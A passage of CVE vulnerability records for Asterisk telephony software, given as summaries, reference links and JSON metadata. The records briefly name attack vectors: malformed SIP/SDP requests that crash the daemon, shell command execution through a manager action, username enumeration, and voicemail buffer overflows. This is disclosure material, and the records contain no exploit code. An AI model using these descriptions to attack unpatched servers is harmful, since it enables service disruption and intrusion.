	http://secunia.com/advisories/54617	third-party-advisory, x_refsource_SECUNIA
	http://www.debian.org/security/2013/dsa-2749	vendor-advisory, x_refsource_DEBIAN
	https://issues.asterisk.org/jira/browse/ASTERISK-22007	x_refsource_CONFIRM
	http://www.securitytracker.com/id/1028957	vdb-entry, x_refsource_SECTRACK
	http://www.securityfocus.com/bid/62022	vdb-entry, x_refsource_BID
	http://archives.neohapsis.com/archives/bugtraq/2013-08/0174.html	mailing-list, x_refsource_BUGTRAQ
	http://www.mandriva.com/security/advisories?name=MDVSA-2013:223	vendor-advisory, x_refsource_MANDRIVA

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T17:15:21.608Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "54534",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/54534"
          },
          {
            "name": "96690",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://osvdb.org/96690"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2013-005.html"
          },
          {
            "name": "54617",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/54617"
          },
          {
            "name": "DSA-2749",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2013/dsa-2749"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-22007"
          },
          {
            "name": "1028957",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1028957"
          },
          {
            "name": "62022",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/62022"
          },
          {
            "name": "20130827 AST-2013-005: Remote Crash when Invalid SDP is sent in SIP Request",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://archives.neohapsis.com/archives/bugtraq/2013-08/0174.html"
          },
          {
            "name": "MDVSA-2013:223",
            "tags": [
              "vendor-advisory",
              "x_refsource_MANDRIVA",
              "x_transferred"
            ],
            "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2013:223"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2013-08-27T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1.8.x before 1.8.23.1, 10.x before 10.12.3, and 11.x before 11.5.1; Certified Asterisk 1.8.15 before 1.8.15-cert3 and 11.2 before 11.2-cert2; and Asterisk Digiumphones 10.x-digiumphones before 10.12.3-digiumphones allows remote attackers to cause a denial of service (NULL pointer dereference, segmentation fault, and daemon crash) via an invalid SDP that defines a media description before the connection description in a SIP request."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2013-09-12T09:00:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "54534",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/54534"
        },
        {
          "name": "96690",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://osvdb.org/96690"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2013-005.html"
        },
        {
          "name": "54617",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/54617"
        },
        {
          "name": "DSA-2749",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2013/dsa-2749"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-22007"
        },
        {
          "name": "1028957",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1028957"
        },
        {
          "name": "62022",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/62022"
        },
        {
          "name": "20130827 AST-2013-005: Remote Crash when Invalid SDP is sent in SIP Request",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://archives.neohapsis.com/archives/bugtraq/2013-08/0174.html"
        },
        {
          "name": "MDVSA-2013:223",
          "tags": [
            "vendor-advisory",
            "x_refsource_MANDRIVA"
          ],
          "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2013:223"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2013-5642",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1.8.x before 1.8.23.1, 10.x before 10.12.3, and 11.x before 11.5.1; Certified Asterisk 1.8.15 before 1.8.15-cert3 and 11.2 before 11.2-cert2; and Asterisk Digiumphones 10.x-digiumphones before 10.12.3-digiumphones allows remote attackers to cause a denial of service (NULL pointer dereference, segmentation fault, and daemon crash) via an invalid SDP that defines a media description before the connection description in a SIP request."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "54534",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/54534"
            },
            {
              "name": "96690",
              "refsource": "OSVDB",
              "url": "http://osvdb.org/96690"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2013-005.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2013-005.html"
            },
            {
              "name": "54617",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/54617"
            },
            {
              "name": "DSA-2749",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2013/dsa-2749"
            },
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-22007",
              "refsource": "CONFIRM",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-22007"
            },
            {
              "name": "1028957",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1028957"
            },
            {
              "name": "62022",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/62022"
            },
            {
              "name": "20130827 AST-2013-005: Remote Crash when Invalid SDP is sent in SIP Request",
              "refsource": "BUGTRAQ",
              "url": "http://archives.neohapsis.com/archives/bugtraq/2013-08/0174.html"
            },
            {
              "name": "MDVSA-2013:223",
              "refsource": "MANDRIVA",
              "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2013:223"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2013-5642",
    "datePublished": "2013-09-09T17:00:00",
    "dateReserved": "2013-08-28T00:00:00",
    "dateUpdated": "2024-08-06T17:15:21.608Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2014-4046

Vulnerability from cvelistv5

Published

2014-06-17 14:00

Modified

2024-08-06 11:04

Severity ?

Summary

Asterisk Open Source 11.x before 11.10.1 and 12.x before 12.3.1 and Certified Asterisk 11.6 before 11.6-cert3 allows remote authenticated Manager users to execute arbitrary shell commands via a MixMonitor action.

References

▼	URL	Tags
	http://www.securityfocus.com/archive/1/532419/100/0/threaded	mailing-list, x_refsource_BUGTRAQ
	http://packetstormsecurity.com/files/127088/Asterisk-Project-Security-Advisory-AST-2014-006.html	x_refsource_MISC
	http://downloads.asterisk.org/pub/security/AST-2014-006.html	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T11:04:27.670Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "20140612 AST-2014-006: Asterisk Manager User Unauthorized Shell Access",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/532419/100/0/threaded"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/127088/Asterisk-Project-Security-Advisory-AST-2014-006.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2014-006.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2014-06-12T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Asterisk Open Source 11.x before 11.10.1 and 12.x before 12.3.1 and Certified Asterisk 11.6 before 11.6-cert3 allows remote authenticated Manager users to execute arbitrary shell commands via a MixMonitor action."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-09T18:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "20140612 AST-2014-006: Asterisk Manager User Unauthorized Shell Access",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/532419/100/0/threaded"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/127088/Asterisk-Project-Security-Advisory-AST-2014-006.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2014-006.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2014-4046",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Asterisk Open Source 11.x before 11.10.1 and 12.x before 12.3.1 and Certified Asterisk 11.6 before 11.6-cert3 allows remote authenticated Manager users to execute arbitrary shell commands via a MixMonitor action."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20140612 AST-2014-006: Asterisk Manager User Unauthorized Shell Access",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/532419/100/0/threaded"
            },
            {
              "name": "http://packetstormsecurity.com/files/127088/Asterisk-Project-Security-Advisory-AST-2014-006.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/127088/Asterisk-Project-Security-Advisory-AST-2014-006.html"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2014-006.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2014-006.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2014-4046",
    "datePublished": "2014-06-17T14:00:00",
    "dateReserved": "2014-06-12T00:00:00",
    "dateUpdated": "2024-08-06T11:04:27.670Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2011-2666

Vulnerability from cvelistv5

Published

2011-07-06 19:00

Modified

2024-08-06 23:08

Severity ?

Summary

The default configuration of the SIP channel driver in Asterisk Open Source 1.4.x through 1.4.41.2 and 1.6.2.x through 1.6.2.18.2 does not enable the alwaysauthreject option, which allows remote attackers to enumerate account names by making a series of invalid SIP requests and observing the differences in the responses for different usernames, a different vulnerability than CVE-2011-2536.

References

▼	URL	Tags
	https://exchange.xforce.ibmcloud.com/vulnerabilities/68472	vdb-entry, x_refsource_XF
	http://downloads.asterisk.org/pub/security/AST-2011-011.html	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T23:08:23.735Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "asterisk-sip-channel-info-disclosure(68472)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/68472"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2011-011.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2011-06-28T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The default configuration of the SIP channel driver in Asterisk Open Source 1.4.x through 1.4.41.2 and 1.6.2.x through 1.6.2.18.2 does not enable the alwaysauthreject option, which allows remote attackers to enumerate account names by making a series of invalid SIP requests and observing the differences in the responses for different usernames, a different vulnerability than CVE-2011-2536."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-08-28T12:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "asterisk-sip-channel-info-disclosure(68472)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/68472"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2011-011.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2011-2666",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The default configuration of the SIP channel driver in Asterisk Open Source 1.4.x through 1.4.41.2 and 1.6.2.x through 1.6.2.18.2 does not enable the alwaysauthreject option, which allows remote attackers to enumerate account names by making a series of invalid SIP requests and observing the differences in the responses for different usernames, a different vulnerability than CVE-2011-2536."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "asterisk-sip-channel-info-disclosure(68472)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/68472"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2011-011.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2011-011.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2011-2666",
    "datePublished": "2011-07-06T19:00:00",
    "dateReserved": "2011-07-06T00:00:00",
    "dateUpdated": "2024-08-06T23:08:23.735Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2011-2216

Vulnerability from cvelistv5

Published

2011-06-06 19:00

Modified

2024-08-06 22:53

Severity ?

Summary

reqresp_parser.c in the SIP channel driver in Asterisk Open Source 1.8.x before 1.8.4.2 does not initialize certain strings, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a malformed Contact header.

References

▼	URL	Tags
	http://www.securityfocus.com/archive/1/518236/100/0/threaded	mailing-list, x_refsource_BUGTRAQ
	http://secunia.com/advisories/44828	third-party-advisory, x_refsource_SECUNIA
	http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062658.html	vendor-advisory, x_refsource_FEDORA
	http://lists.fedoraproject.org/pipermail/package-announce/2011-June/062013.html	vendor-advisory, x_refsource_FEDORA
	http://securitytracker.com/id?1025598	vdb-entry, x_refsource_SECTRACK
	http://downloads.digium.com/pub/security/AST-2011-007.html	x_refsource_CONFIRM
	http://osvdb.org/72752	vdb-entry, x_refsource_OSVDB
	http://www.securityfocus.com/bid/48096	vdb-entry, x_refsource_BID
	https://exchange.xforce.ibmcloud.com/vulnerabilities/67812	vdb-entry, x_refsource_XF

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T22:53:17.447Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "20110602 AST-2011-007",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/518236/100/0/threaded"
          },
          {
            "name": "44828",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/44828"
          },
          {
            "name": "FEDORA-2011-8983",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062658.html"
          },
          {
            "name": "FEDORA-2011-8319",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-June/062013.html"
          },
          {
            "name": "1025598",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1025598"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.digium.com/pub/security/AST-2011-007.html"
          },
          {
            "name": "72752",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://osvdb.org/72752"
          },
          {
            "name": "48096",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/48096"
          },
          {
            "name": "asterisk-parseurifull-dos(67812)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/67812"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2011-05-23T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "reqresp_parser.c in the SIP channel driver in Asterisk Open Source 1.8.x before 1.8.4.2 does not initialize certain strings, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a malformed Contact header."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-09T18:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "20110602 AST-2011-007",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/518236/100/0/threaded"
        },
        {
          "name": "44828",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/44828"
        },
        {
          "name": "FEDORA-2011-8983",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062658.html"
        },
        {
          "name": "FEDORA-2011-8319",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-June/062013.html"
        },
        {
          "name": "1025598",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1025598"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.digium.com/pub/security/AST-2011-007.html"
        },
        {
          "name": "72752",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://osvdb.org/72752"
        },
        {
          "name": "48096",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/48096"
        },
        {
          "name": "asterisk-parseurifull-dos(67812)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/67812"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2011-2216",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "reqresp_parser.c in the SIP channel driver in Asterisk Open Source 1.8.x before 1.8.4.2 does not initialize certain strings, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a malformed Contact header."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20110602 AST-2011-007",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/518236/100/0/threaded"
            },
            {
              "name": "44828",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/44828"
            },
            {
              "name": "FEDORA-2011-8983",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062658.html"
            },
            {
              "name": "FEDORA-2011-8319",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-June/062013.html"
            },
            {
              "name": "1025598",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1025598"
            },
            {
              "name": "http://downloads.digium.com/pub/security/AST-2011-007.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.digium.com/pub/security/AST-2011-007.html"
            },
            {
              "name": "72752",
              "refsource": "OSVDB",
              "url": "http://osvdb.org/72752"
            },
            {
              "name": "48096",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/48096"
            },
            {
              "name": "asterisk-parseurifull-dos(67812)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/67812"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2011-2216",
    "datePublished": "2011-06-06T19:00:00",
    "dateReserved": "2011-05-31T00:00:00",
    "dateUpdated": "2024-08-06T22:53:17.447Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2007-5358

Vulnerability from cvelistv5

Published

2007-10-12 23:00

Modified

2024-08-07 15:31

Severity ?

Summary

Multiple buffer overflows in the voicemail functionality in Asterisk 1.4.x before 1.4.13, when using IMAP storage, might allow (1) remote attackers to execute arbitrary code via a long combination of Content-type and Content-description headers, or (2) local users to execute arbitrary code via a long combination of astspooldir, voicemail context, and voicemail mailbox fields. NOTE: vector 2 requires write access to Asterisk configuration files.

References

▼	URL	Tags
	http://downloads.digium.com/pub/security/AST-2007-022.html	x_refsource_CONFIRM
	http://osvdb.org/38201	vdb-entry, x_refsource_OSVDB
	https://exchange.xforce.ibmcloud.com/vulnerabilities/37052	vdb-entry, x_refsource_XF
	http://osvdb.org/38202	vdb-entry, x_refsource_OSVDB
	http://secunia.com/advisories/27184	third-party-advisory, x_refsource_SECUNIA
	http://www.securitytracker.com/id?1018804	vdb-entry, x_refsource_SECTRACK
	http://www.securityfocus.com/bid/26005	vdb-entry, x_refsource_BID
	https://exchange.xforce.ibmcloud.com/vulnerabilities/37051	vdb-entry, x_refsource_XF
	http://www.securityfocus.com/archive/1/481996/100/0/threaded	mailing-list, x_refsource_BUGTRAQ
	http://www.vupen.com/english/advisories/2007/3454	vdb-entry, x_refsource_VUPEN

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T15:31:57.205Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.digium.com/pub/security/AST-2007-022.html"
          },
          {
            "name": "38201",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://osvdb.org/38201"
          },
          {
            "name": "asterisk-contentheader-bo(37052)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/37052"
          },
          {
            "name": "38202",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://osvdb.org/38202"
          },
          {
            "name": "27184",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/27184"
          },
          {
            "name": "1018804",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id?1018804"
          },
          {
            "name": "26005",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/26005"
          },
          {
            "name": "asterisk-sprintf-bo(37051)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/37051"
          },
          {
            "name": "20071010 AST-2007-022: Buffer overflows in voicemail when using IMAP storage",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/481996/100/0/threaded"
          },
          {
            "name": "ADV-2007-3454",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2007/3454"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2007-10-10T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple buffer overflows in the voicemail functionality in Asterisk 1.4.x before 1.4.13, when using IMAP storage, might allow (1) remote attackers to execute arbitrary code via a long combination of Content-type and Content-description headers, or (2) local users to execute arbitrary code via a long combination of astspooldir, voicemail context, and voicemail mailbox fields.  NOTE: vector 2 requires write access to Asterisk configuration files."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
